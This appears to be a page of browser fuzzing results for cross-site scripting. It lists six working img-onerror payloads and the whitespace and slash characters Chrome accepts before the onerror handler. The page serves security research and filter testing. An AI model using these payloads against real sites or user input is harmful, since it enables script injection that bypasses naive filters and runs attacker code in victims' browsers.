Characters allowed before onerror events
This XSS vector shows what characters can be used before the onerror event.
Created by: renniepak
Created on: Saturday, April 20, 2024 at 11:59:27 AM
Updated on: Friday, July 26, 2024 at 5:09:32 PM
Vector type: XSS
Template used:
<img src $[chr]onerror=log($[i])>
Your browser was detected as:
Detecting... Detecting... Detecting... Detecting...
Sample payloads
<img src onerror=alert(9)>
<img src
onerror=alert(10)>
<img src
onerror=alert(12)>
<img src
onerror=alert(13)>
<img src onerror=alert(32)>
<img src /onerror=alert(47)>
Fuzz results
Chrome 124.0.0.0 Unknown Unknown
Found 6 results
| Dec | Hex | Chr |
|---|---|---|
| 9 | 09 | HT |
| Dec | Hex | Chr |
|---|---|---|
| 10 | 0a | LF |
| Dec | Hex | Chr |
|---|---|---|
| 12 | 0c | FF |
| Dec | Hex | Chr |
|---|---|---|
| 13 | 0d | CR |
| Dec | Hex | Chr |
|---|---|---|
| 32 | 20 | SPACE |
| Dec | Hex | Chr |
|---|---|---|
| 47 | 2f | / |